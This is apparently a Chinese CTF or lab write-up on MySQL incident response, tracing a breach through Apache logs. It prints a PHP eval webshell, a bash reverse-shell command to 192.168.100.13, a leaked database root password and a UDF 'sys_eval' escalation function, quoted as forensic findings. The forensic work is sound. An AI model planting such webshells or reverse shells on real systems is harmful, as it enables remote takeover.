第二章日志分析-mysql应急响应

第二章日志分析-mysql应急响应

步骤一

1
root@xuanji:/var/log/apache2# cat access.log | awk '/.php/{print $7}'

我先看了web日志,发现有可疑的php文件

1

1
2
3
4
root@xuanji:/var/log/apache2# cat /var/www/html/sh.php 
1       2       <?php @eval($_POST['a']);?>     4
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b
root@xuanji:/var/log/apache2#

步骤二

1
cat access.log | awk '/\?/{print $7}';

看一下有没有可疑的参数拼接啥的

2

1
2
root@xuanji:/var/log/apache2# cat /tmp/1.sh 
bash -i >&/dev/tcp/192.168.100.13/777 0>&1root@xuanji:/var/log/apache2#

步骤三和四

1
2
3
4
5
6
7
8
9
root@xuanji:/var/www/html# ls
Writenote.php  adminer.php  common.php  css  images  index.php  js  log.php  search.php  sh.php  tmpubzil.php  tmputsrv.php  tmpuvdzm.php
root@xuanji:/var/www/html# cat common.php 
<?php
$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");
if(!$conn){
echo "数据库连接失败";
}
root@xuanji:/var/www/html#

泄露了账号和密码,可能是udf提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@xuanji:/# mysql -uroot -p334cc35b3c704593
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 4
Server version: 5.5.64-MariaDB-1ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show variables like "%secure_file_priv%";
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.00 sec)

MariaDB [(none)]>

更加确定了,就是的,查一直udf提权后的自建函数

1
2
3
4
5
6
7
MariaDB [(none)]> select * from mysql.func;
+----------+-----+-------------+----------+
| name     | ret | dl          | type     |
+----------+-----+-------------+----------+
| sys_eval |   0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)
1
2
3
4
5
6
7
8
MariaDB [(none)]> select sys_eval("whoami");              
+--------------------+
| sys_eval("whoami") |
+--------------------+
| mysql
             |
+--------------------+
1 row in set (0.01 sec)

权限是mysql,udf提权一般是要产生so文件的,在/usr/lib/mysql/plugin下面

1
2
3
root@xuanji:/usr/lib/mysql/plugin# ls
auth_pam.so     dialog.so     handlersocket.so         mysqludf.so         semisync_slave.so  sphinx.so      udf.so
auth_socket.so  ha_innodb.so  mysql_clear_password.so  semisync_master.so  server_audit.so    sql_errlog.so

udf.so比较像啊

1
2
root@xuanji:/usr/lib/mysql/plugin# echo  -n "/usr/lib/mysql/plugin/udf.so" | md5sum
b1818bde4e310f3d23f1005185b973e7  -